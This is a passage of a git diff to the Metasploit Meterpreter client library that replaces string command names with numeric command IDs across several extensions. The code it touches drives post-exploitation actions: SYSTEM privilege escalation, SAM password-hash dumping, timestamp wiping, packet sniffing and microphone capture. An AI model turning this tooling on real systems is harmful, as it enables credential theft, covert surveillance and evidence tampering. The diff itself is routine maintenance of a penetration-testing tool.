-TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64       = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 3)
-TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE     = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
-TLV_TYPE_PEINJECTOR_RESULT                = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_PEINJECTOR = 16000
 
+# Associated command ids
+COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE = EXTENSION_ID_PEINJECTOR + 1
+
+TLV_TYPE_PEINJECTOR_SHELLCODE         = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1)
+TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE    = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2)
+TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64   = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 3)
+TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
+TLV_TYPE_PEINJECTOR_RESULT            = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
 
 end
 end
diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
index 08afb46b7f98d..adeb44f09184a 100644
--- a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
+++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
@@ -17,6 +17,9 @@ module Powershell
 ###
 class Powershell < Extension
 
+  def self.extension_id
+    EXTENSION_ID_POWERSHELL
+  end
 
   def initialize(client)
     super(client, 'powershell')
@@ -45,7 +48,7 @@ def import_file(opts={})
       # TODO: perhaps do some kind of check to see if the DLL is a .NET assembly?
       binary = ::File.read(opts[:file])
 
-      request = Packet.create_request('powershell_assembly_load')
+      request = Packet.create_request(COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD)
       request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE, binary.length)
       request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY, binary)
       client.send_request(request)
@@ -57,7 +60,7 @@ def import_file(opts={})
 
   def session_remove(opts={})
     return false unless opts[:session_id]
-    request = Packet.create_request('powershell_session_remove')
+    request = Packet.create_request(COMMAND_ID_POWERSHELL_SESSION_REMOVE)
     request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]
     client.send_request(request)
     return true
@@ -66,7 +69,7 @@ def session_remove(opts={})
   def execute_string(opts={})
     return nil unless opts[:code]
 
-    request = Packet.create_request('powershell_execute')
+    request = Packet.create_request(COMMAND_ID_POWERSHELL_EXECUTE)
     request.add_tlv(TLV_TYPE_POWERSHELL_CODE, opts[:code])
     request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]
 
@@ -75,7 +78,7 @@ def execute_string(opts={})
   end
 
   def shell(opts={})
-    request = Packet.create_request('powershell_shell')
+    request = Packet.create_request(COMMAND_ID_POWERSHELL_SHELL)
     request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]
 
     response = client.send_request(request)
diff --git a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb
index edb69d3c68ac6..eb6e670351f67 100644
--- a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb
@@ -5,6 +5,15 @@ module Meterpreter
 module Extensions
 module Powershell
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_POWERSHELL = 14000
+
+# Associated command ids
+COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD  = EXTENSION_ID_POWERSHELL + 1
+COMMAND_ID_POWERSHELL_EXECUTE        = EXTENSION_ID_POWERSHELL + 2
+COMMAND_ID_POWERSHELL_SESSION_REMOVE = EXTENSION_ID_POWERSHELL + 3
+COMMAND_ID_POWERSHELL_SHELL          = EXTENSION_ID_POWERSHELL + 4
+
 TLV_TYPE_POWERSHELL_SESSIONID        = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1)
 TLV_TYPE_POWERSHELL_CODE             = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
 TLV_TYPE_POWERSHELL_RESULT           = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
diff --git a/lib/rex/post/meterpreter/extensions/priv/fs.rb b/lib/rex/post/meterpreter/extensions/priv/fs.rb
index 2cae2972b5ecf..deb899c2838e7 100644
--- a/lib/rex/post/meterpreter/extensions/priv/fs.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/fs.rb
@@ -27,7 +27,7 @@ def initialize(client)
   # values for the specified file path.
   #
   def get_file_mace(file_path)
-    request = Packet.create_request('priv_fs_get_file_mace')
+    request = Packet.create_request(COMMAND_ID_PRIV_FS_GET_FILE_MACE)
 
     request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
 
@@ -42,7 +42,7 @@ def get_file_mace(file_path)
         'Entry Modified' => Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_EMODIFIED))
       }
     rescue RangeError
-      raise RangeError, "Invalid MACE values"
+      raise RangeError, 'Invalid MACE values'
     end
   end
 
@@ -53,7 +53,7 @@ def get_file_mace(file_path)
   #
   def set_file_mace(file_path, modified = nil, accessed = nil, created = nil,
     entry_modified = nil)
-    request = Packet.create_request('priv_fs_set_file_mace')
+    request = Packet.create_request(COMMAND_ID_PRIV_FS_SET_FILE_MACE)
 
     request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
     request.add_tlv(TLV_TYPE_FS_FILE_MODIFIED, modified.to_i) if (modified)
@@ -71,7 +71,7 @@ def set_file_mace(file_path, modified = nil, accessed = nil, created = nil,
   # attributes of the source_file_path.
   #
   def set_file_mace_from_file(target_file_path, source_file_path)
-    request = Packet.create_request('priv_fs_set_file_mace_from_file')
+    request = Packet.create_request(COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE)
 
     request.add_tlv(TLV_TYPE_FS_FILE_PATH, target_file_path)
     request.add_tlv(TLV_TYPE_FS_SRC_FILE_PATH, source_file_path)
@@ -86,7 +86,7 @@ def set_file_mace_from_file(target_file_path, source_file_path)
   # be displayed by most all products for a file.
   #
   def blank_file_mace(file_path)
-    request = Packet.create_request('priv_fs_blank_file_mace')
+    request = Packet.create_request(COMMAND_ID_PRIV_FS_BLANK_FILE_MACE)
 
     request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
 
@@ -100,7 +100,7 @@ def blank_file_mace(file_path)
   # directory.
   #
   def blank_directory_mace(dir_path)
-    request = Packet.create_request('priv_fs_blank_directory_mace')
+    request = Packet.create_request(COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE)
 
     request.add_tlv(TLV_TYPE_FS_FILE_PATH, dir_path)
 
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index ffadc6630e714..78e07f0923d7d 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -19,6 +19,10 @@ module Priv
 ###
 class Priv < Extension
 
+  def self.extension_id
+    EXTENSION_ID_PRIV
+  end
+
   #
   # Initializes the privilege escalationextension.
   #
@@ -40,14 +44,14 @@ def initialize(client)
   #
   # Attempt to elevate the meterpreter to Local SYSTEM
   #
-  def getsystem( technique=0 )
-    request = Packet.create_request( 'priv_elevate_getsystem' )
+  def getsystem(technique=0)
+    request = Packet.create_request(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM)
 
     # We only need the elevate DLL for when we're invoking the tokendup
     # method, which we'll only use if required (ie. trying all or when
     # that metdho is asked for explicitly)
     if [0, 3].include?(technique)
-      elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
+      elevator_name = Rex::Text.rand_text_alpha_lower(6)
 
       elevator_path = nil
       client.binary_suffix.each { |s|
@@ -57,40 +61,40 @@ def getsystem( technique=0 )
         end
       }
       if elevator_path.nil?
-        elevators = ""
+        elevators = ''
         client.binary_suffix.each { |s|
           elevators << "elevator.#{s}, "
         }
         raise RuntimeError, "#{elevators.chomp(', ')} not found", caller
       end
 
-      elevator_data = ""
+      elevator_data = ''
 
-      ::File.open( elevator_path, "rb" ) { |f|
-        elevator_data += f.read( f.stat.size )
+      ::File.open(elevator_path, 'rb') { |f|
+        elevator_data += f.read(f.stat.size)
       }
 
-      request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
-      request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
-      request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length )
+      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name)
+      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data)
+      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length)
     end
 
-    request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique )
+    request.add_tlv(TLV_TYPE_ELEVATE_TECHNIQUE, technique)
 
     # as some service routines can be slow we bump up the timeout to 90 seconds
-    response = client.send_request( request, 90 )
+    response = client.send_request(request, 90)
 
-    technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE )
+    technique = response.get_tlv_value(TLV_TYPE_ELEVATE_TECHNIQUE)
 
-    if( response.result == 0 and technique != nil )
-      client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
+    if(response.result == 0 and technique != nil)
+      client.core.use('stdapi') if not client.ext.aliases.include?('stdapi')
       client.update_session_info
       client.sys.config.getprivs
       if client.framework.db and client.framework.db.active
         client.framework.db.report_note(
           :host => client.sock.peerhost,
           :workspace => client.framework.db.workspace,
-          :type => "meterpreter.getsystem",
+          :type => 'meterpreter.getsystem',
           :data => {:technique => technique}
         ) rescue nil
       end
@@ -105,7 +109,7 @@ def getsystem( technique=0 )
   #
   def sam_hashes
     # This can take a long long time for large domain controls, bump the timeout to one hour
-    response = client.send_request(Packet.create_request('priv_passwd_get_sam_hashes'), 3600)
+    response = client.send_request(Packet.create_request(COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES), 3600)
 
     response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
       SamUser.new(hash)
diff --git a/lib/rex/post/meterpreter/extensions/priv/tlv.rb b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
index 92cf1b7f4ad43..a19ffdef3c978 100644
--- a/lib/rex/post/meterpreter/extensions/priv/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
@@ -5,6 +5,18 @@ module Meterpreter
 module Extensions
 module Priv
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_PRIV = 2000
+
+# Associated command ids
+COMMAND_ID_PRIV_ELEVATE_GETSYSTEM          = EXTENSION_ID_PRIV + 1
+COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE    = EXTENSION_ID_PRIV + 2
+COMMAND_ID_PRIV_FS_BLANK_FILE_MACE         = EXTENSION_ID_PRIV + 3
+COMMAND_ID_PRIV_FS_GET_FILE_MACE           = EXTENSION_ID_PRIV + 4
+COMMAND_ID_PRIV_FS_SET_FILE_MACE           = EXTENSION_ID_PRIV + 5
+COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE = EXTENSION_ID_PRIV + 6
+COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES      = EXTENSION_ID_PRIV + 7
+
 # Passwd
 TLV_TYPE_SAM_HASHES                 = TLV_META_TYPE_STRING | (TLV_EXTENSIONS +   1)
 
diff --git a/lib/rex/post/meterpreter/extensions/python/python.rb b/lib/rex/post/meterpreter/extensions/python/python.rb
index ee079a95b0b75..36cb69465635b 100644
--- a/lib/rex/post/meterpreter/extensions/python/python.rb
+++ b/lib/rex/post/meterpreter/extensions/python/python.rb
@@ -28,6 +28,10 @@ class Python < Extension
     '.pyc' => PY_CODE_TYPE_PYC
   }
 
+  def self.extension_id
+    EXTENSION_ID_PYTHON
+  end
+
   #
   # Typical extension initialization routine.
   #
@@ -45,7 +49,7 @@ def initialize(client)
   end
 
   def reset
-    request = Packet.create_request('python_reset')
+    request = Packet.create_request(COMMAND_ID_PYTHON_RESET)
     client.send_request(request)
 
     return true
@@ -63,7 +67,7 @@ def import(file, mod_name, result_var)
 
     code = ::File.read(file)
 
-    request = Packet.create_request('python_execute')
+    request = Packet.create_request(COMMAND_ID_PYTHON_EXECUTE)
     request.add_tlv(TLV_TYPE_PYTHON_CODE, code)
     request.add_tlv(TLV_TYPE_PYTHON_CODE_LEN, code.length)
     request.add_tlv(TLV_TYPE_PYTHON_CODE_TYPE, PY_CODE_FILE_TYPE_MAP[ext])
@@ -78,7 +82,7 @@ def import(file, mod_name, result_var)
   #
   # @return [Hash<Symbol,Object>]
   def execute_string(code, result_var)
-    request = Packet.create_request('python_execute')
+    request = Packet.create_request(COMMAND_ID_PYTHON_EXECUTE)
     request.add_tlv(TLV_TYPE_PYTHON_CODE, code)
     request.add_tlv(TLV_TYPE_PYTHON_CODE_TYPE, PY_CODE_TYPE_STRING)
     request.add_tlv(TLV_TYPE_PYTHON_RESULT_VAR, result_var) if result_var
diff --git a/lib/rex/post/meterpreter/extensions/python/tlv.rb b/lib/rex/post/meterpreter/extensions/python/tlv.rb
index 318593a6b8cca..181dd9ebfaa8a 100644
--- a/lib/rex/post/meterpreter/extensions/python/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/python/tlv.rb
@@ -5,6 +5,14 @@ module Meterpreter
 module Extensions
 module Python
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_PYTHON = 13000
+
+# Associated command ids
+COMMAND_ID_PYTHON_EXECUTE = EXTENSION_ID_PYTHON + 1
+COMMAND_ID_PYTHON_RESET   = EXTENSION_ID_PYTHON + 2
+
+
 TLV_TYPE_PYTHON_STDOUT             = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1)
 TLV_TYPE_PYTHON_STDERR             = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
 TLV_TYPE_PYTHON_CODE               = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 3)
diff --git a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
index 02f5421d45cfd..3b7870d611105 100644
--- a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
+++ b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
@@ -16,6 +16,9 @@ module Sniffer
 ###
 class Sniffer < Extension
 
+  def self.extension_id
+    EXTENSION_ID_SNIFFER
+  end
 
   def initialize(client)
     super(client, 'sniffer')
@@ -33,8 +36,7 @@ def initialize(client)
   # Enumerate the remote sniffable interfaces
   def interfaces()
     ifaces = []
-    ifacei = 0
-    request = Packet.create_request('sniffer_interfaces')
+    request = Packet.create_request(COMMAND_ID_SNIFFER_INTERFACES)
     response = client.send_request(request)
     response.each(TLV_TYPE_SNIFFER_INTERFACES) { |p|
       vals  = p.tlvs.map{|x| x.value }
@@ -54,16 +56,16 @@ def interfaces()
 
   # Start a packet capture on an opened interface
   def capture_start(intf,maxp=200000,filter="")
-    request = Packet.create_request('sniffer_capture_start')
+    request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_START)
     request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
     request.add_tlv(TLV_TYPE_SNIFFER_PACKET_COUNT, maxp.to_i)
     request.add_tlv(TLV_TYPE_SNIFFER_ADDITIONAL_FILTER, filter) if filter.length > 0
-    response = client.send_request(request)
+    client.send_request(request)
   end
 
   # Stop an active packet capture
   def capture_stop(intf)
-    request = Packet.create_request('sniffer_capture_stop')
+    request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_STOP)
     request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
     response = client.send_request(request)
     {
@@ -74,7 +76,7 @@ def capture_stop(intf)
 
   # Retrieve stats about a current capture
   def capture_stats(intf)
-    request = Packet.create_request('sniffer_capture_stats')
+    request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_STATS)
     request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
     response = client.send_request(request)
     {
@@ -85,7 +87,7 @@ def capture_stats(intf)
 
   # Release packets from a current capture
   def capture_release(intf)
-    request = Packet.create_request('sniffer_capture_release')
+    request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_RELEASE)
     request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
     response = client.send_request(request)
     {
@@ -96,7 +98,7 @@ def capture_release(intf)
 
   # Buffer the current capture to a readable buffer
   def capture_dump(intf)
-    request = Packet.create_request('sniffer_capture_dump')
+    request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_DUMP)
     request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
     response = client.send_request(request, 3600)
     {
@@ -108,7 +110,7 @@ def capture_dump(intf)
 
   # Retrieve the packet data for the specified capture
   def capture_dump_read(intf, len=16384)
-    request = Packet.create_request('sniffer_capture_dump_read')
+    request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ)
     request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
     request.add_tlv(TLV_TYPE_SNIFFER_BYTE_COUNT, len.to_i)
     response = client.send_request(request, 3600)
diff --git a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
index 67f076f443aff..fbb4af3c68c53 100644
--- a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
@@ -5,7 +5,20 @@ module Meterpreter
 module Extensions
 module Sniffer
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_SNIFFER = 4000
+
+# Associated command ids
+COMMAND_ID_SNIFFER_CAPTURE_DUMP      = EXTENSION_ID_SNIFFER + 1
+COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ = EXTENSION_ID_SNIFFER + 2
+COMMAND_ID_SNIFFER_CAPTURE_RELEASE   = EXTENSION_ID_SNIFFER + 3
+COMMAND_ID_SNIFFER_CAPTURE_START     = EXTENSION_ID_SNIFFER + 4
+COMMAND_ID_SNIFFER_CAPTURE_STATS     = EXTENSION_ID_SNIFFER + 5
+COMMAND_ID_SNIFFER_CAPTURE_STOP      = EXTENSION_ID_SNIFFER + 6
+COMMAND_ID_SNIFFER_INTERFACES        = EXTENSION_ID_SNIFFER + 7
+
 TLV_TYPE_EXTENSION_SNIFFER		= 0
+
 TLV_TYPE_SNIFFER_INTERFACES		= TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 1)
 TLV_TYPE_SNIFFER_INTERFACE_ID		= TLV_META_TYPE_UINT  | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 2)
 TLV_TYPE_SNIFFER_INTERFACE_HANDLE	= TLV_META_TYPE_UINT  | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 3)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb
index fe789b17525c8..4ea7af1237c9c 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb
@@ -1,4 +1,5 @@
 # -*- coding: binary -*-
+#
 
 ###
 #
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb
index e36b33efb89cd..e880633933405 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb
@@ -53,7 +53,7 @@ def each(&block)
   # Enumerates all of the files/folders in a given directory.
   #
   def Dir.entries(name = getwd, glob = nil)
-    request = Packet.create_request('stdapi_fs_ls')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_LS)
     files   = []
     name = name + ::File::SEPARATOR + glob if glob
 
@@ -72,7 +72,7 @@ def Dir.entries(name = getwd, glob = nil)
   # Enumerates files with a bit more information than the default entries.
   #
   def Dir.entries_with_info(name = getwd)
-    request = Packet.create_request('stdapi_fs_ls')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_LS)
     files = []
     sbuf = nil
     new_stat_buf = true
@@ -130,7 +130,7 @@ def Dir.match(name, dir = false)
     sbuf = nil
     new_stat_buf = true
 
-    request = Packet.create_request('stdapi_fs_ls')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_LS)
     request.add_tlv(TLV_TYPE_DIRECTORY_PATH, client.unicode_filter_decode(path))
     response = client.send_request(request)
 
@@ -176,11 +176,11 @@ def Dir.match(name, dir = false)
   # Changes the working directory of the remote process.
   #
   def Dir.chdir(path)
-    request = Packet.create_request('stdapi_fs_chdir')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_CHDIR)
 
     request.add_tlv(TLV_TYPE_DIRECTORY_PATH, client.unicode_filter_decode( path ))
 
-    response = client.send_request(request)
+    client.send_request(request)
 
     getwd(refresh: true)
     return 0
@@ -190,11 +190,11 @@ def Dir.chdir(path)
   # Creates a directory.
   #
   def Dir.mkdir(path)
-    request = Packet.create_request('stdapi_fs_mkdir')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_MKDIR)
 
     request.add_tlv(TLV_TYPE_DIRECTORY_PATH, client.unicode_filter_decode( path ))
 
-    response = client.send_request(request)
+    client.send_request(request)
 
     return 0
   end
@@ -204,7 +204,7 @@ def Dir.mkdir(path)
   #
   def Dir.pwd(refresh: true)
     if @working_directory.nil? || refresh
-      request = Packet.create_request('stdapi_fs_getwd')
+      request = Packet.create_request(COMMAND_ID_STDAPI_FS_GETWD)
 
       response = client.send_request(request)
 
@@ -224,11 +224,11 @@ def Dir.getwd(refresh: true)
   # Removes the supplied directory if it's empty.
   #
   def Dir.delete(path)
-    request = Packet.create_request('stdapi_fs_delete_dir')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_DELETE_DIR)
 
     request.add_tlv(TLV_TYPE_DIRECTORY_PATH, client.unicode_filter_decode( path ))
 
-    response = client.send_request(request)
+    client.send_request(request)
 
     return 0
   end
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
index 8fd356cc10f02..319609a2d6efa 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
@@ -40,7 +40,7 @@ def File.separator()
     # unnecessary requests.
     return @separator if @separator
 
-    request = Packet.create_request('stdapi_fs_separator')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_SEPARATOR)
 
     # Fall back to the old behavior of always assuming windows.  This
     # allows meterpreter executables built before the addition of this
@@ -79,7 +79,7 @@ def File.search( root=nil, glob="*.*", recurse=true, timeout=-1 )
 
     files = ::Array.new
 
-    request = Packet.create_request( 'stdapi_fs_search' )
+    request = Packet.create_request( COMMAND_ID_STDAPI_FS_SEARCH )
 
     root = client.unicode_filter_decode(root) if root
     root = root.chomp( self.separator ) if root
@@ -135,7 +135,7 @@ def File.basename(*a)
   # caution.
   #
   def File.expand_path(path)
-    request = Packet.create_request('stdapi_fs_file_expand_path')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH)
 
     request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( path ))
 
@@ -149,7 +149,7 @@ def File.expand_path(path)
   # Calculates the MD5 (16-bytes raw) of a remote file
   #
   def File.md5(path)
-    request = Packet.create_request('stdapi_fs_md5')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_MD5)
 
     request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( path ))
 
@@ -165,7 +165,7 @@ def File.md5(path)
   # Calculates the SHA1 (20-bytes raw) of a remote file
   #
   def File.sha1(path)
-    request = Packet.create_request('stdapi_fs_sha1')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_SHA1)
 
     request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( path ))
 
@@ -196,7 +196,7 @@ def File.exist?(name)
   # Performs a delete on the remote file +name+
   #
   def File.rm(name)
-    request = Packet.create_request('stdapi_fs_delete_file')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_DELETE_FILE)
 
     request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( name ))
 
@@ -214,7 +214,7 @@ class << self
   # Performs a rename from oldname to newname
   #
   def File.mv(oldname, newname)
-    request = Packet.create_request('stdapi_fs_file_move')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_FILE_MOVE)
 
     request.add_tlv(TLV_TYPE_FILE_NAME, client.unicode_filter_decode( oldname ))
     request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( newname ))
@@ -233,7 +233,7 @@ class << self
   # Performs a copy from oldname to newname
   #
   def File.cp(oldname, newname)
-    request = Packet.create_request('stdapi_fs_file_copy')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_FILE_COPY)
 
     request.add_tlv(TLV_TYPE_FILE_NAME, client.unicode_filter_decode( oldname ))
     request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( newname ))
@@ -251,7 +251,7 @@ class << self
   # Performs a chmod on the remote file
   #
   def File.chmod(name, mode)
-    request = Packet.create_request('stdapi_fs_chmod')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_CHMOD)
 
     request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( name ))
     request.add_tlv(TLV_TYPE_FILE_MODE_T, mode)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb
index 8d51644bbd36a..d6a5b9c9a045f 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb
@@ -130,7 +130,7 @@ def update32(stat_buf)
   # hash to the requestor.
   #
   def stat(file)
-    request = Packet.create_request('stdapi_fs_stat')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_STAT)
 
     request.add_tlv(TLV_TYPE_FILE_PATH, self.class.client.unicode_filter_decode( file ))
 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/mount.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/mount.rb
index 0a57673f45266..a396e9aac3555 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/mount.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/mount.rb
@@ -27,7 +27,7 @@ def initialize(client)
   end
 
   def show_mount
-    request = Packet.create_request('stdapi_fs_mount_show')
+    request = Packet.create_request(COMMAND_ID_STDAPI_FS_MOUNT_SHOW)
 
     response = client.send_request(request)
 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb b/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb
index 08d61e42fce92..2d339ba86da36 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb
@@ -4,59 +4,60 @@
 require 'rex/post/meterpreter/channels/pools/stream_pool'
 
 module Rex
-  module Post
-    module Meterpreter
-      module Extensions
-        module Stdapi
-          module Mic
-
-            ###
-            #
-            # This meterpreter extension can list and capture from microphone
-            #
-            ###
-            class Mic
-              def initialize(client)
-                @client = client
-              end
-
-              def session
-                @client
-              end
-
-              # List available microphones
-              def mic_list
-                response = client.send_request(Packet.create_request('stdapi_audio_mic_list'))
-                names = []
-                if response.result == 0
-                  response.get_tlvs(TLV_TYPE_AUDIO_INTERFACE_NAME).each do |tlv|
-                    names << tlv.value
-                  end
-                end
-                names
-              end
-
-              # Starts recording audio from microphone
-              def mic_start(device_id)
-                request = Packet.create_request('stdapi_audio_mic_start')
-                request.add_tlv(TLV_TYPE_AUDIO_INTERFACE_ID, device_id)
-                response = client.send_request(request)
-                return nil unless response.result == 0
-
-                channel = Channel.create(client, 'audio_mic', Rex::Post::Meterpreter::Channels::Pools::StreamPool, CHANNEL_FLAG_SYNCHRONOUS, response)
-              end
-
-              # Stop recording from microphone
-              def mic_stop
-                client.send_request(Packet.create_request('stdapi_audio_mic_stop'))
-                true
-              end
-
-              attr_accessor :client
-            end
-          end
-        end
+module Post
+module Meterpreter
+module Extensions
+module Stdapi
+module Mic
+
+###
+#
+# This meterpreter extension can list and capture from microphone
+#
+###
+class Mic
+  def initialize(client)
+    @client = client
+  end
+
+  def session
+    @client
+  end
+
+  # List available microphones
+  def mic_list
+    response = client.send_request(Packet.create_request(COMMAND_ID_STDAPI_AUDIO_MIC_LIST))
+    names = []
+    if response.result == 0
+      response.get_tlvs(TLV_TYPE_AUDIO_INTERFACE_NAME).each do |tlv|
+        names << tlv.value
       end
     end
+    names
+  end
+
+  # Starts recording audio from microphone
+  def mic_start(device_id)
